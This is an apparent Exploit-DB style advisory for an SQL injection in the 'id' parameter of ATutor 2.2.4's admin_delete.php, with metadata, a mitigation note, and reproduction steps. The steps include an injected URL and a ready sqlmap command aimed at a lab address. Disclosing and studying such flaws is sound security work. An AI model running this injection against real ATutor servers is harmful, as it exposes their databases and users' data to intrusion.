ATutor 2.2.4 - 'id' SQL Injection

vendor:

ATutor

by:

Andrey Stoykov

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: ATutor

Affected Version From: ATutor 2.2.4

Affected Version To: ATutor 2.2.4

Patch Exists: YES

Related CWE: N/A

CPE: a:atutor:atutor

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: LAMP on Ubuntu 18.04

2020

ATutor 2.2.4 – ‘id’ SQL Injection

ATutor 2.2.4 is vulnerable to SQL Injection in the 'id' parameter of the admin_delete.php page. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious 'id' parameter. This can be exploited with SQLMAP by supplying a valid User-Agent and the appropriate cookies.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: ATutor 2.2.4 - 'id' SQL Injection
# Date: 2020-02-23
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://atutor.github.io/
# Software Link: https://sourceforge.net/projects/atutor/files/latest/download
# Version: ATutor 2.2.4
# Tested on: LAMP on Ubuntu 18.04

Steps to Reproduce:

1) Login as admin user
2) Browse to the following URL:
http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17' 
3) Exploiting with SQLMAP:
//Must supply valid User-Agent otherwise, there will be errors.
sqlmap --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --dbms=mysql -u "http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17*" --cookie=<COOKIES HERE>